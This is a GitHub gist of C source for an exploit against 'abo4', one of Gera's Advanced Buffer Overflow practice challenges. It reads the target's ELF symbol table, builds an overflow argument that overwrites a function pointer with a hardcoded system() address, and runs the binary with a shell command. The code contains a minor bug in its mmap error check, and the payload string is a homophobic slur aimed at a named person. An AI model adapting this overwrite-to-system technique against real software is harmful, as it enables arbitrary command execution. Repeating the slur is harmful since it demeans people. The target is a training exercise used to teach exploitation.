Created
January 5, 2018 02:11
-
-
Save gagomes/fcef12ffe7868e5ec8cb52755c8af7ab to your computer and use it in GitHub Desktop.
A no-bruteforce exploit against abo4 from the "Advanced Buffer Overflow" collection by Gera, written sometime circa 2002--2003
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <fcntl.h> | |
| #include <errno.h> | |
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <sys/mman.h> | |
| #include <elf.h> | |
| #include <link.h> | |
| #include <assert.h> | |
| #define ABO "abo4" | |
| #if !defined(__linux__) || !defined(__i386__) | |
| #error @#$%! | |
| #endif | |
| void hexdump(unsigned char *data, int size) | |
| { | |
| int i, j = 0; | |
| printf("--begin dump--\n"); | |
| for (i = 0; i < size; i++, j += 3) { | |
| if (j && !(j % 26)) | |
| printf("\n"); | |
| printf("%02x ", data[i]); | |
| } | |
| printf("\n--end dump--\n"); | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| unsigned char *elf; | |
| char *symstr; | |
| Elf32_Ehdr *ehdr; | |
| Elf32_Shdr *shdr, *sec; | |
| Elf32_Sym *sym; | |
| int nsym; | |
| struct stat st; | |
| int fd, n, i; | |
| fd = open(ABO, O_RDONLY); | |
| if (fd < 0) | |
| return printf("open: %s\n", strerror(errno)); | |
| n = fstat(fd, &st); | |
| if (n < 0) | |
| return printf("fstat: %s\n", strerror(errno)); | |
| elf = mmap(0, st.st_size, PROT_READ, MAP_SHARED, fd, 0); | |
| if (ehdr == MAP_FAILED) | |
| return printf("mmap: %s\n", strerror(errno)); | |
| ehdr = (Elf32_Ehdr *) &elf[0]; | |
| shdr = (Elf32_Shdr *) &elf[ehdr->e_shoff]; | |
| for (i = 0; i < ehdr->e_shnum; i++) | |
| if (shdr[i].sh_type == SHT_SYMTAB) | |
| break; | |
| if (shdr[i].sh_type != SHT_SYMTAB) | |
| return printf("unable to find teh symbol table\n"); | |
| sec = (Elf32_Shdr *) &elf[ehdr->e_shoff]; | |
| sym = (Elf32_Sym *) &elf[shdr[i].sh_offset]; | |
| symstr = (char *) &elf[sec[shdr[i].sh_link].sh_offset]; | |
| nsym = shdr[i].sh_size / sizeof(Elf32_Sym); | |
| for (i = 0; i < nsym; i++) | |
| if (!memcmp(&symstr[sym[i].st_name], "fn", 2)) | |
| break; | |
| assert(!memcmp(&symstr[sym[i].st_name], "fn", 2)); | |
| { | |
| unsigned int poke_addr = sym[i].st_value; | |
| unsigned int system_addr = 0x4006b974; | |
| Elf32_Sym *ref = NULL; | |
| char argv1[261]; | |
| char argv2[5]; | |
| char argv3[] = "echo s33k is gay \\;\\]\n"; | |
| char *e_argv[5]; | |
| extern struct link_map *_dl_loaded; | |
| struct link_map *lmap; | |
| printf("%p\n", (void *)&system); | |
| // lmap = _dl_lookup_symbol("system", _dl_loaded, &ref, | |
| // _dl_loaded->l_scope, 0, 0); | |
| memset(argv1, 0x0, sizeof argv1); | |
| memset(argv2, 0x0, sizeof argv2); | |
| for (i = 0; i < sizeof(argv1) - 1; i++) | |
| argv1[i] = 0x41; | |
| printf("poke_addr = 0x%08x\n", poke_addr); | |
| printf("system = 0x%08x\n", system_addr); | |
| i -= 5; | |
| argv1[++i] = (poke_addr >> 0x00) & 0xff; | |
| argv1[++i] = (poke_addr >> 0x08) & 0xff; | |
| argv1[++i] = (poke_addr >> 0x10) & 0xff; | |
| argv1[++i] = (poke_addr >> 0x18) & 0xff; | |
| //hexdump(&argv1[0], sizeof argv1); | |
| argv2[0] = (system_addr >> 0x00) & 0xff; | |
| argv2[1] = (system_addr >> 0x08) & 0xff; | |
| argv2[2] = (system_addr >> 0x10) & 0xff; | |
| argv2[3] = (system_addr >> 0x18) & 0xff; | |
| //hexdump(&argv2[0], sizeof argv2); | |
| e_argv[0] = ABO; | |
| e_argv[1] = &argv1[0]; | |
| e_argv[2] = &argv2[0]; | |
| e_argv[3] = &argv3[0]; | |
| e_argv[4] = NULL; | |
| printf("executing...\n"); | |
| execve("./abo4", e_argv, NULL); | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment